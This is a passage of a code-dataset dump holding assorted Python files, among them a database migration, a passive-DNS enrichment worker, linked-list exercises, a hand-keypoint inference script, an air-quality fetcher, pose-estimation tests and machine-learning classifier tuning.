id\"})\n","sub_path":"pos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"215020311","text":"def delchar(s, c):\r\n str=\"\"\r\n if len(c) == 1:\r\n for i in range(len(s)):\r\n if s[i] != c:\r\n str = str + s[i]\r\n return str\r\n else:\r\n return s\r\n\r\n\r\nprint(delchar(\"banana\", 'nn'))\r\n","sub_path":"removechar.py","file_name":"removechar.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"325444678","text":"\"\"\"add country_codes table\n\nRevision ID: 0fc36eff189a\nRevises: a1ca152082e9\nCreate Date: 2018-08-09 23:13:47.509786\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '0fc36eff189a'\ndown_revision = 'a1ca152082e9'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('country_codes',\n sa.Column('country_id', sa.Integer(), nullable=False),\n sa.Column('country_code', sa.String(length=2), nullable=True),\n sa.ForeignKeyConstraint(['country_id'], ['countries.id'], onupdate='CASCADE', ondelete='CASCADE'),\n sa.PrimaryKeyConstraint('country_id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('country_codes')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/0fc36eff189a_add_country_codes_table.py","file_name":"0fc36eff189a_add_country_codes_table.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"619910649","text":"import pickle\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef get_stats(x):\n stats = {}\n x.sort()\n n = len(x)\n x_pert = np.arange(5,100,5)\n for pert in x_pert:\n \n stats[pert] = x[int(n*pert/100.0 + 0.5)]\n return stats\n\ndef read_sav_files(sav_file):\n pkl_file = open(sav_file, 'rb')\n data = pickle.load(pkl_file)\n return data\n \nrospa_data = read_sav_files(\"../sav_files/rospa-driver-reports-2014-01-07.sav\") \naxaie_data = read_sav_files(\"../sav_files/axaie-driver-reports-2014-01-10.sav\") \n\nstats = {}\nroad_types = rospa_data['pace'].keys() \nfor metric in rospa_data:\n if metric not in stats:\n stats[metric] = {}\n for i,road_type in enumerate(road_types):\n stats[metric][road_type] = get_stats(rospa_data[metric][road_type])#,label=road_type,color='c',normed=True\n\n \nfor metric in axaie_data:\n \n plt.figure(metric)\n for i,road_type in enumerate(road_types):\n max_var = max(axaie_data[metric][road_type])\n min_var = min(axaie_data[metric][road_type])\n if max_var< max(rospa_data[metric][road_type]):\n max_var =max(rospa_data[metric][road_type])\n if min_var > min(rospa_data[metric][road_type]):\n min_var = min(rospa_data[metric][road_type])\n dx = (max_var*1.2-min_var*0.8)/20\n numbins = np.arange(min_var*0.8,max_var*1.2 + dx,dx)\n plt.subplot(6,2,i+1)\n plt.hist(axaie_data[metric][road_type],color='c',label=road_type,alpha =0.5)\n plt.hist(rospa_data[metric][road_type],color='r',label=road_type,alpha =0.5)\n plt.axvline(stats[metric][road_type][25], color='r', linestyle='dashed', linewidth=2)\n plt.axvline(stats[metric][road_type][75], color='blue', linestyle='dashed', linewidth=2)\n plt.legend(loc=0)\nplt.show()\n \n \n","sub_path":"mydrive_python/check_axa_distributions/code/plot_axaie_with_rospa.py","file_name":"plot_axaie_with_rospa.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"496527463","text":"#!/usr/bin/env python3\n\n\"\"\"Worker module reading domains and ip-addresses from\nstdin, writing result in a format understandable by\ngeneric_uploader.py to stdout\"\"\"\n\nimport argparse\nimport socket\nimport sys\nfrom logging import warning, error\nimport traceback\nimport urllib3\nimport requests\nimport worker\nimport act\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nRRTYPE_M = {\n \"a\": {\n \"fact_t\": \"resolvesTo\",\n \"fact_v\": \"A\",\n \"source_t\": \"fqdn\",\n \"dest_t\": \"ipv4\"\n },\n \"aaaa\": {\n \"fact_t\": \"resolvesTo\",\n \"fact_v\": \"AAAA\",\n \"source_t\": \"fqdn\",\n \"dest_t\": \"ipv6\"\n },\n \"cname\": {\n \"fact_t\": \"resolvesTo\",\n \"fact_v\": \"CNAME\",\n \"source_t\": \"fqdn\",\n \"dest_t\": \"fqdn\"\n }\n}\n\ndef parseargs() -> argparse.Namespace:\n \"\"\" Parse arguments \"\"\"\n parser = worker.parseargs('PDNS enrichment')\n parser.add_argument('--pdns-baseurl', dest='pdns_baseurl',\n default=\"https://api.mnemonic.no/\", help=\"Argus API host\")\n parser.add_argument('--pdns-timeout', dest='timeout', type=int,\n default=299, help=\"Timeout\")\n parser.add_argument('--pdns-apikey', dest='apikey',\n help=\"Argus API key\")\n\n return parser.parse_args()\n\n\n\ndef batch_query(url, headers=None, timeout=299):\n \"\"\" Execute query until we have all results \"\"\"\n\n offset = 0\n count = 0\n\n proxies = {\n 'http': ARGS.proxy_string,\n 'https': ARGS.proxy_string\n }\n\n options = {\n \"headers\": headers,\n \"verify\": False,\n \"timeout\": timeout,\n \"proxies\": proxies,\n \"params\": {}\n }\n\n while True: # do - while offset < count\n options[\"params\"][\"offset\"] = offset\n req = requests.get(url, **options)\n\n if not req.status_code == 200:\n errmsg = \"status_code: {0.status_code}: {0.content}\"\n raise UnknownResult(errmsg.format(req))\n\n res = req.json()\n data = res[\"data\"]\n count = res.get(\"count\", 0)\n\n yield from data\n\n offset += len(data)\n\n if offset >= count:\n break\n\n\ndef pdns_query(pdns_baseurl, apikey, query, timeout):\n \"\"\"Query the passivedns result of an address.\n pdns_baseurl - the url to the passivedns api (https://api.mnemonic.no)\n apikey - Argus API key with the passivedns role (minimum)\n query - string fqdn or ipv4/6\n timeout - default 299 seconds.\n \"\"\"\n\n try:\n qmap = {\n \"baseurl\": pdns_baseurl.strip(\"/\"),\n \"query\": query\n }\n\n pdns_url = \"{baseurl}/pdns/v3/{query}\".format(**qmap)\n\n if apikey:\n headers = {\"Argus-API-Key\": apikey}\n else:\n headers = {}\n\n return batch_query(pdns_url,\n headers=headers,\n timeout=timeout)\n\n except (urllib3.exceptions.ReadTimeoutError,\n requests.exceptions.ReadTimeout,\n socket.timeout) as err:\n error(\"Timeout ({0.__class__.__name__}), query: {1}\".format(\n err, query))\n\n\ndef process(actapi, pdns_baseurl, apikey, timeout=299):\n \"\"\"Read queries from stdin, resolve each one through passivedns\n printing generic_uploader data to stdout\"\"\"\n\n for query in sys.stdin:\n query = query.strip()\n if not query:\n continue\n\n for row in pdns_query(pdns_baseurl, apikey, timeout=timeout, query=query):\n rrtype = row[\"rrtype\"]\n query = row[\"query\"]\n answer = row[\"answer\"]\n\n if rrtype in RRTYPE_M:\n act.helpers.handle_fact(\n actapi.fact(RRTYPE_M[rrtype][\"fact_t\"],\n RRTYPE_M[rrtype][\"fact_v\"])\n .source(RRTYPE_M[rrtype][\"source_t\"], query)\n .destination(RRTYPE_M[rrtype][\"dest_t\"], answer))\n\n elif rrtype == \"ptr\":\n pass # We do not insert ptr to act\n else:\n warning(\"Unsupported rrtype: %s: %s\" % (rrtype, row))\n\n\nclass UnknownResult(Exception):\n \"\"\"UnknownResult is used in API request (not 200 result)\"\"\"\n\n def __init__(self, *args, **kwargs):\n Exception.__init__(self, *args, **kwargs)\n\n\nif __name__ == '__main__':\n ARGS = parseargs()\n\n try:\n actapi = act.Act(ARGS.act_baseurl, ARGS.user_id, ARGS.loglevel, ARGS.logfile, \"pdns-enrichment\")\n process(actapi, ARGS.pdns_baseurl, ARGS.apikey, ARGS.timeout)\n except Exception as e:\n error(\"Unhandled exception: {}\".format(traceback.format_exc()))\n raise\n","sub_path":"pdns_enrichment.py","file_name":"pdns_enrichment.py","file_ext":"py","file_size_in_byte":4632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"378148872","text":"1.\nclass Solution:\n def searchRange(self, nums: List[int], target: int) -> List[int]:\n res=[-1, -1]\n l=bisect_left(nums, target)\n if l==len(nums) or nums[l]!=target: return res\n res[0]=l\n r=bisect_right(nums, target, l)\n res[1]=r-1\n\n return res\n\n2.\nclass Solution:\n def searchRange(self, nums: List[int], target: int) -> List[int]:\n res, n=[-1, -1], len(nums)\n l, r=0, n\n while l imageToTest.shape[0]:\n hand_bottom -= bottom - imageToTest.shape[0]\n bottom = imageToTest.shape[0]\n\n right = hand_center[0] + self.center\n hand_right = self.boxsize\n if right > imageToTest.shape[1]:\n hand_right -= right - imageToTest.shape[1]\n right = imageToTest.shape[1]\n\n hand_image[hand_top:hand_bottom, hand_left:hand_right] = imageToTest[top:bottom, left:right]\n # cropping done\n cv.imwrite('hand_image.jpg', hand_image)\n\n input_4channels = np.ones((self.boxsize, self.boxsize, 4))\n input_4channels[:,:,0:3] = hand_image / 256.0 - 0.5 # normalize to [-0.5, 0.5]\n input_4channels[:,:,3] = self.gaussian_map\n self.hand_net.blobs['data'].data[...] = np.transpose(np.float32(input_4channels[:,:,:,np.newaxis]), (3,2,0,1))\n start_time = time.time()\n output_blob = self.hand_net.forward()['Mconv5_stage3']\n print('net took %.2f ms.' % (1000 * (time.time() - start_time)))\n\n for part in range(self.npart):\n part_map = output_blob[0, part, :, :]\n part_map_resized = cv.resize(part_map, (0,0), fx=8, fy=8, interpolation=cv.INTER_CUBIC)\n self.prediction[part,:] = np.unravel_index(part_map_resized.argmax(), part_map_resized.shape)\n\n self.prediction[:,0] = (hand_center[1] - self.center + self.prediction[:,0]) / real_scale\n self.prediction[:,1] = (hand_center[0] - self.center + self.prediction[:,1]) / real_scale\n\n return self.prediction\n\nclass MixMLP(nn.Block):\n def __init__(self, **kwargs):\n super(MixMLP, self).__init__(**kwargs)\n self.blk = nn.Sequential()\n self.blk.add(nn.Dense(3, activation='relu'),\n nn.Dense(4, activation='relu'))\n self.dense = nn.Dense(5)\n \n def forward(self, x):\n y = nd.relu(self.blk(x))\n print(y)\n return self.dense(y)\n\n # net = MixMLP()\n # net\n # net.initialize()\n # x = nd.random.uniform(shape=(2,2))\n # net(x)\n # net.blk[1].weight.data()\n\ndef main():\n keypoint_detector = Keypoint_Inference()\n\n test_image = 'Image1529571920899.jpg'\n hand_box = [321, 525, 86, 366] # [xmin xmax ymin ymax]\n oriImg = cv.imread(test_image, cv.IMREAD_COLOR)\n prediction = keypoint_detector.predict(oriImg, hand_box) # shape = (5, 2); dtype = np.float64\n for part in range(keypoint_detector.npart):\n cv.circle(oriImg, (int(round(prediction[part, 1])), int(round(prediction[part, 0]))), 3, (255, 255, 0), -1)\n cv.imwrite('detected.jpg', oriImg)\n\n test_image = 'Image1529576385972.jpg'\n hand_box = [440, 650, 244, 484]\n oriImg = cv.imread(test_image, cv.IMREAD_COLOR)\n prediction = keypoint_detector.predict(oriImg, hand_box)\n for part in range(keypoint_detector.npart):\n cv.circle(oriImg, (int(round(prediction[part, 1])), int(round(prediction[part, 0]))), 3, (255, 255, 0), -1)\n cv.imwrite('detected_.jpg', oriImg)\n\nif __name__ == '__main__':\n main()","sub_path":"Code2Graph/test/pythonScripts/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":5355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"12707795","text":"import json\nimport pandas as pd\nfrom pandas.io.json import json_normalize\n\n\n# Reading in JSON data from link\ndata = pd.read_json('http://pinpointapi.cox2m.com/v1/association?q=all')\n\n# Building list of rowindex that need to be dropped\nrowToDrop = []\nfor i in range(data.shape[0]):\n if \"workOrderId\" not in data['items'][i]['tracker']:\n rowToDrop.append(i)\n elif \"id\" not in data['items'][i]['tracker']:\n rowToDrop.append(i)\n elif str(data['items'][i]['workOrder']) in ['None','nan']:\n rowToDrop.append(i)\n elif 'Model' not in data['items'][i]['workOrder']['vinData']:\n rowToDrop.append(i)\n elif str(data['items'][i]['workOrder']['vinData']['Make']) in ['None','nan']:\n rowToDrop.append(i)\n\n\n# Dropping the rows from the data using rowToDrop\nfor number in rowToDrop:\n del data['items'][number]\n\n# Converting the JSON data into pandas dataframe \ndf = pd.DataFrame(json_normalize(data['items']))\n\n# Creating a dictionary which stores each lot as a key and storing workOrderId, trackerId, model, color, battery status as tuple in a list for a lot key\nlotDict = {}\n\n# Accessing the dataframe rowindex\nfor row in df.index:\n# Processing the data value for storing into dictionary and accessing the dataframe column name\n for column in df.columns:\n# Checking if the lot name is the column name\n if column == \"tracker.data.lot.name\":\n lotName = df[column][row]\n# Checking if tracker.id is the column name\n elif column == \"tracker.id\":\n trackerId = df[column][row]\n# Checking if latitude is the column name\n elif column == \"tracker.data.position.lat\":\n lat = df[column][row]\n# Checking if battery status is the column name\n elif column == \"tracker.data.battery\":\n battery = df[column][row]\n# Checking if longitude is the column name\n elif column == \"tracker.data.position.lon\":\n lon = df[column][row]\n# Checking tracker and workorderId association, so if workOrderId is 'None' or 'nan' tracker is ignored because it is not associated with a car\n elif column == \"tracker.workOrderId\":\n #ignoring the data in case of None or nan workorderId\n if str(df[column][row]) in ['None','nan']:\n break\n# Else processing that row\n else:\n workerid = df[column][row]\n# Checking if Car Maker name is the column name\n elif column == \"workOrder.vinData.Make\":\n carModel = df[column][row]\n# Checking if Car Model year is the column name\n elif column == \"workOrder.vinData.ModelYear\":\n carModelYear = df[column][row]\n# Checking if Car Color is the column name\n elif column == \"workOrder.color\":\n carColor = df[column][row]\n\n# Updating the dictionary from processed row of dataframe if lotName not in the dictionary, update key and value as list which has stored all information as tuple in a list for each tracker.\n if lotName not in lotDict:\n lotDict[lotName] = [(lat,lon,workerid,trackerId,carModel,carColor,carModelYear,battery)]\n else:\n lotDict[lotName].append((lat,lon,workerid,trackerId,carModel,carColor,carModelYear,battery))\n\n# Printing the all the lot name and information stored for a lot\nfor lotName,list1 in lotDict.items():\n number = len(list1)\n print(lotName,number,list1)\n\n# Printing the top 5 lots, and most popular make of cars in each lot\ncount = 0\nprint(\"\\nTop 5 lot according to number of tracker available\")\nfor lotName,list1 in sorted(lotDict.items(),key = lambda x : len(x[1]),reverse=True):\n if count < 5:\n count += 1\n carList = [ tuple1[4] for tuple1 in list1]\n carName = max(carList,key=carList.count)\n print(\"{}. LotName : {} Tracker Frequency : {} Most Popular Car: {} \" .format(count,lotName,len(list1),carName))\n else:\n break","sub_path":"Leverege.py","file_name":"Leverege.py","file_ext":"py","file_size_in_byte":3863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"407204051","text":"#!/usr/bin/env python3\n\nimport urllib.request, json, time\n\nair_quality_ile_de_france_url = \"https://services8.arcgis.com/gtmasQsdfwbDAQSQ/arcgis/rest/services/ind_idf_agglo/FeatureServer/0/query?where=1%3D1&outFields=*&returnGeometry=false&orderByFields=date_echea%20DESC&outSR=4326&f=json\"\nair_quality = json.loads(eval(str(urllib.request.urlopen(air_quality_ile_de_france_url).read())))\n\nquality = air_quality[\"features\"][0][\"attributes\"][\"qualificat\"].capitalize()\nquality_value = int(air_quality[\"features\"][0][\"attributes\"][\"valeur\"])\nmeasure_date = int(str(air_quality[\"features\"][0][\"attributes\"][\"date_echea\"])[0:-3])\nmeasure_date = time.strftime(\"%a, %d %b %Y %H:%M:%S\", time.localtime(measure_date))\n\npm25_url = \"https://services8.arcgis.com/gtmasQsdfwbDAQSQ/arcgis/rest/services/mes_idf_horaire_pm25/FeatureServer/0/query?where=UPPER(code_station_ue)%20like%20%27%254143%25%27&outFields=*&returnGeometry=false&orderByFields=date_fin%20DESC&outSR=4326&f=json\"\npm25_levels = json.loads(eval(str(urllib.request.urlopen(pm25_url).read())))\n\npm25_value = \"%.1f\" % (float(pm25_levels[\"features\"][0][\"attributes\"][\"valeur\"]))\npm25_unit = str(pm25_levels[\"features\"][0][\"attributes\"][\"unite\"])\npm25_measure_date = int(str(pm25_levels[\"features\"][0][\"attributes\"][\"date_fin\"])[0:-3])\npm25_measure_date = time.strftime(\"%a, %d %b %Y %H:%M:%S\", time.localtime(pm25_measure_date))\n\npm10_url = \"https://services8.arcgis.com/gtmasQsdfwbDAQSQ/arcgis/rest/services/mes_idf_horaire_pm10/FeatureServer/0/query?where=UPPER(code_station_ue)%20like%20%27%254143%25%27&outFields=*&returnGeometry=false&orderByFields=date_fin%20DESC&outSR=4326&f=json\"\npm10_levels = json.loads(eval(str(urllib.request.urlopen(pm10_url).read())))\n\npm10_value = \"%.1f\" % (float(pm10_levels[\"features\"][0][\"attributes\"][\"valeur\"]))\npm10_unit = str(pm10_levels[\"features\"][0][\"attributes\"][\"unite\"])\npm10_measure_date = int(str(pm10_levels[\"features\"][0][\"attributes\"][\"date_fin\"])[0:-3])\npm10_measure_date = time.strftime(\"%a, %d %b %Y %H:%M:%S\", time.localtime(pm10_measure_date))\n\n\nprint(\"%s, %i/10 | PM2.5: %s/%s (max 25) | PM10: %s/%s (max 50)\" % (quality, quality_value, pm25_value, pm25_unit, pm10_value, pm10_unit))\n\n","sub_path":"scripts/airparif.py","file_name":"airparif.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"108593674","text":"#!/usr/bin/env python\nimport sys\nsys.path.append(\"../../build/lib\")\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport random\n\nimport pymrpt\n\ndef vector2RotMat(vec, theta=0):\n #Rodrigues rotation formula\n n_check=np.linalg.norm(vec)\n \n kx=vec[0]/n_check\n ky=vec[1]/n_check\n kz=vec[2]/n_check\n \n K=np.matrix([[0, -kz, ky],[kz, 0, -kx],[-ky, kx, 0]])\n I=np.identity(3)\n \n R=I+K*np.sin(theta)+K*K*(1-np.cos(theta))\n R=np.array(R)\n \n return R\n\ndef display_comparison_plot(t, arr, names, title, xtitle, ytitle):\n for i in np.arange(0,len(arr)):\n plt.plot(t,arr[i,:],label=names[i])\n \n plt.xlabel(xtitle)\n plt.ylabel(ytitle)\n plt.title(title)\n ax=plt.gca()\n ax.set_ylim([0,10])\n\n# Define number of points and camera parameters\nn=6\nf=1.0\ncx=0.0\ncy=0.0\n\n# Instantiate pnp module\npnp = pymrpt.pnp(n)\n\n# Define object points and image points\nobj_pts=np.array([[0,0,0],[0,0,-50.0],[2,0,35],[5,-40,25],[10,15,9],[-20,50,7]])\nimg_pts=np.empty([n,2])\nimg_pts_=np.empty([n,3])\nimg_pts_[:,2]=1\n\npose_epnp=np.empty([6,1])\npose_upnp=np.empty([6,1])\npose_dls=np.empty([6,1])\npose_p3p=np.empty([6,1])\npose_ppnp=np.empty([6,1])\npose_posit=np.empty([6,1])\npose_mat_orig=np.empty([4,4])\n\nn_iter=100\nn_algos=6\n\nerr_t_epnp=[]\nerr_t_dls=[]\nerr_t_upnp=[]\nerr_t_p3p=[]\nerr_t_ppnp=[]\nerr_t_posit=[]\n\nfor it in np.arange(0,n_iter):\n\n # Define camera extrinsic matrix\n v=2*np.random.random([3]) - np.array([1,1,1])\n v=v/np.linalg.norm(v)\n \n #R=np.array([[0.841986, -0.352662, -0.408276],[0.308904, 0.935579, -0.171085],[0.442309, 0.0179335, 0.896683]])\n R = vector2RotMat(v, np.pi*2/3)\n t=np.array([0.0,0.0,100.0])\n \n # Compute image points based on actual extrinsic matrix and add noise to measurements\n for i in range(0,6):\n pt=np.dot(R,obj_pts[i,:])+t\n img_pts[i,:]= np.array([pt[0]/pt[2] +random.uniform(-0.01,0.01), pt[1]/pt[2]+random.uniform(-0.01,0.01)])\n \n img_pts_[:,0:2]=img_pts \n \n pose_mat_orig[3,:]=np.array([0,0,0,1])\n pose_mat_orig[0:3,3]=t;\n pose_mat_orig[0:3,0:3]=R\n cam_intrinsic=np.array([[f,0.0,cx],[0.0,f,cy],[0.0, 0.0, 1.0]])\n \n # Use the c-library to compute the pose \n pnp.epnp_solve(obj_pts,img_pts, 6, cam_intrinsic, pose_epnp)\n pnp.dls_solve(obj_pts, img_pts, 6, cam_intrinsic, pose_dls)\n pnp.upnp_solve(obj_pts,img_pts, 6, cam_intrinsic, pose_upnp)\n pnp.p3p_solve(obj_pts[1:4,:], img_pts[1:4,:],6, cam_intrinsic, pose_p3p)\n pnp.ppnp_solve(obj_pts,img_pts_, 6, cam_intrinsic, pose_ppnp)\n pnp.posit_solve(obj_pts,img_pts,6,cam_intrinsic, pose_posit)\n\n t_epnp=np.concatenate(pose_epnp[0:3])\n t_dls=np.concatenate(pose_dls[0:3])\n t_upnp=np.concatenate(pose_upnp[0:3])\n t_p3p=np.concatenate(pose_p3p[0:3])\n t_ppnp=np.concatenate(pose_ppnp[0:3])\n t_posit=np.concatenate(pose_posit[0:3])\n \n err_t_epnp.append(np.linalg.norm(t-t_epnp))\n err_t_dls.append(np.linalg.norm(t-t_dls))\n err_t_upnp.append(np.linalg.norm(t-t_upnp))\n err_t_p3p.append(np.linalg.norm(t-t_p3p))\n err_t_ppnp.append(np.linalg.norm(t-t_ppnp))\n err_t_posit.append(np.linalg.norm(t-t_posit))\n\nerr_algos=np.array(err_t_epnp + err_t_dls + err_t_upnp + err_t_p3p + err_t_ppnp + err_t_posit)\nerr_algos=err_algos.reshape(n_algos,n_iter)\n\nit=np.arange(0,n_iter)\n\nplt.figure(1)\ndisplay_comparison_plot(it, err_algos, names=['epnp','dls','upnp','p3p','ppnp','posit'], title='Translation Error Plot', xtitle='Iteration', ytitle='e')\nplt.legend()\nplt.show()\n\n# Display the results\n\"\"\"\nprint \"obj_pts=\\n\", obj_pts\nprint \"img_pts=\\n\",img_pts\nprint \"pose_mat_orig=\\n\", pose_mat_orig\nprint \"pose_mat_est=\\n\",pose_epnp\nprint \"pose_mat_est1=\\n\",pose_dls\nprint \"cam_mat=\\n\",cam_intrinsic\n\"\"\"","sub_path":"python/samples/pnp_tester.py","file_name":"pnp_tester.py","file_ext":"py","file_size_in_byte":3744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"285930439","text":"#!/usr/bin/env python3\n\nimport csv\n\n## read csv\ndef readcsv(csvpath):\n with open(csvpath) as csv_file:\n csv_file.seek(0)\n reader = csv.reader(csv_file)\n header = next(reader)\n readings = []\n for row in reader:\n reading = {}\n for index, heading in enumerate(header):\n reading[heading] = row[index]\n readings.append(reading)\n return readings\n\ndef writecsv(csvpath, dictdata, header = None):\n if header is None:\n headers = list(dictdata[0].keys())\n else:\n headers = header\n \n with open(csvpath, 'w') as csvfile:\n dict_writer = csv.DictWriter(csvfile, headers)\n dict_writer.writeheader()\n dict_writer.writerows(dictdata)\n csvfile.close()","sub_path":"automate/automatelibs/Qcsv.py","file_name":"Qcsv.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"490337100","text":"'''\n>>>两数相加\n Category\tDifficulty\tLikes\tDislikes\n algorithms\tMedium (35.98%)\t4156\t-\n\n 给出两个 非空 的链表用来表示两个非负的整数。\n 其中,它们各自的位数是按照 逆序 的方式存储的,并且它们的每个节点只能存储 一位 数字。\n 如果,我们将这两个数相加起来,则会返回一个新的链表来表示它们的和。\n 您可以假设除了数字 0 之外,这两个数都不会以 0 开头。\n\n 示例:\n 输入:(2 -> 4 -> 3) + (5 -> 6 -> 4)\n 输出:7 -> 0 -> 8\n 原因:342 + 465 = 807\n'''\n\n'''\n 解法1 : 还原数值计算后重建链表\n'''\n# @lc code=start\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n'''\nclass Solution:\n def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:\n num1 = self.translink_to_10(l1)\n num2 = self.translink_to_10(l2)\n num = num1+ num2\n if num == 0:\n return ListNode(0)\n\n head = ListNode(None)\n cr = head\n while(num > 0):\n k = num%10\n node = ListNode(k)\n cr.next = node\n cr = node\n num = num//10 \n #print(head.next.val)\n return head.next\n\n def translink_to_10(self, L:ListNode) -> int:\n num = 0\n temp = L\n i = 0\n while temp != None:\n num += temp.val*(10**i)\n i += 1\n temp = temp.next\n return num\n'''\n# @lc code=end\n\n'''\n 解法2 :链表操作 按位计算\n'''\nclass Solution:\n def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:\n head = ListNode(None)\n cr = head #链表指针\n s = 0 #进位标志\n while(l1 or l2):\n num1 = l1.val if l1 else 0\n num2 = l2.val if l2 else 0\n n = (num1+num2+s)%10\n cr.next = ListNode(n)\n s = (num1+num2+s)//10\n if l1:\n l1 = l1.next\n if l2:\n l2 = l2.next\n cr = cr.next\n if s == 1:\n cr.next = ListNode(1)\n return head.next","sub_path":"DHY_LeetCode/Linked-List/0002.py","file_name":"0002.py","file_ext":"py","file_size_in_byte":2184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"135818511","text":"# Marco Cabrera\r\n# Machine Learning Classifier Methods\r\n# Optimization Fucntions for each classifier methods were developed to find the optimal hyperparameters\r\n# to tune each machine learning algorithm and fine the highest accuracy, precision, and recall scores.\r\nimport streamlit as st\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport sys\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import plot_confusion_matrix, plot_roc_curve, plot_precision_recall_curve\r\nfrom sklearn.metrics import precision_score, recall_score\r\n\r\ndef main():\r\n st.title(\"Machine Learning Classifier Methods\")\r\n st.sidebar.title(\"Select Classifier Methods and Metrics\")\r\n st.markdown(\"Classifier Methods to evaluate risk of Alzheimer's disease after suffering TBI\")\r\n st.sidebar.markdown(\"Tune Hyperparameters:\")\r\n\r\n # Data file is loaded using Pandas\r\n def load_dataset():\r\n dataset = pd.read_csv('/Users/Marco/Desktop/Thesis/apo_e4.csv')\r\n # Label Encoder Method\r\n label_encoder_method = LabelEncoder()\r\n # For-Loop with fit_transform() method\r\n for variable in dataset.columns:\r\n dataset[variable] = label_encoder_method.fit_transform(dataset[variable].astype(str))\r\n return dataset\r\n\r\n # Split method is used to split, train, and test the data\r\n def split_data(dataframe):\r\n y = dataframe['nincds_arda_diagnosis']\r\n x = dataframe.drop(columns=['nincds_arda_diagnosis'])\r\n x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.33, random_state=1)\r\n return x_train, x_test, y_train, y_test\r\n\r\n # Find optimal C hyper-parameter for Support Vector Machine Classifier\r\n def find_optimal_c_svm():\r\n dataframe = load_dataset()\r\n x_train, x_test, y_train, y_test = split_data(dataframe)\r\n c = 0\r\n i = 0\r\n f = open(\"C:/Users/Marco/Desktop/TEST2/svm.txt\", \"a\")\r\n accuracy_c = 0\r\n precision_c = 0\r\n recall_c = 0\r\n highest_accuracy = 0\r\n highest_precision = 0\r\n highest_recall = 0\r\n # while loop to iterate through all possible combinations\r\n while (c <= 100):\r\n c += 0.1\r\n i += 1\r\n # Support Vector Machine Hyper-parameters used: C, Kernel, and Gamma\r\n machine_learning_model = SVC(C=c, kernel=\"rbf\", gamma=\"scale\")\r\n machine_learning_model.fit(x_train, y_train)\r\n y_pred = machine_learning_model.predict(x_test)\r\n # Accuracy, precision, and recall scores\r\n accuracy = machine_learning_model.score(x_test, y_test)\r\n precision = precision_score(y_test, y_pred, labels=axis_legends)\r\n recall = recall_score(y_test, y_pred, labels=axis_legends)\r\n\r\n # Find the optimal combination of iterations in order to find the C hyper-parameter\r\n # that will generate the most optimal accuracy, precision, and recall results.\r\n if (accuracy > highest_accuracy):\r\n highest_accuracy = accuracy\r\n accuracy_c = c\r\n\r\n if (precision > highest_precision):\r\n highest_precision = precision\r\n precision_c = c\r\n\r\n if (recall > highest_recall):\r\n highest_recall = recall\r\n recall_c = c\r\n\r\n f.write(str(i) + \": \" + str(accuracy) + \"\\n\")\r\n # Write optimal C hyper-parameter results on text file after all possible combinations\r\n f.write(\"Optimal C for Accuracy: \" + str(accuracy_c) + \"\\n\")\r\n f.write(\"Optimal C for Precision: \" + str(precision_c) + \"\\n\")\r\n f.write(\"Optimal C for Recall: \" + str(recall_c) + \"\\n\")\r\n f.write(\"Highest Accuracy Result: \" + str(highest_accuracy) + \"\\n\")\r\n f.write(\"Highest Precision Result: \" + str(highest_precision) + \"\\n\")\r\n f.write(\"Highest Recall Result: \" + str(highest_recall) + \"\\n\")\r\n f.close()\r\n\r\n # Find optimal C hyperparameter for Logistic Regression Classifier\r\n def find_optimal_hyperparameters_logistic_regression():\r\n dataframe = load_dataset()\r\n x_train, x_test, y_train, y_test = split_data(dataframe)\r\n # define variables for optimization\r\n optimal_c_accuracy = 0\r\n optimal_c_precision = 0\r\n optimal_c_recall = 0\r\n max_num_iter_accuracy = 0\r\n max_num_iter_precision = 0\r\n max_num_iter_recall = 0\r\n highest_accuracy = 0\r\n highest_precision = 0\r\n highest_recall = 0\r\n # for-loops to iterate through all possible combinations\r\n for i in range(1, 100, 1):\r\n c = i / 100\r\n f = open(\"C:/Users/Marco/Desktop/TEST2/outputsLogisticRegression.txt\", \"a\")\r\n for max_iter in range(1, 101):\r\n # Logistic Regression hyper-parameters used: C, penalty, and max_iter\r\n machine_learning_model = LogisticRegression(C=c, penalty='l2', max_iter=max_iter)\r\n 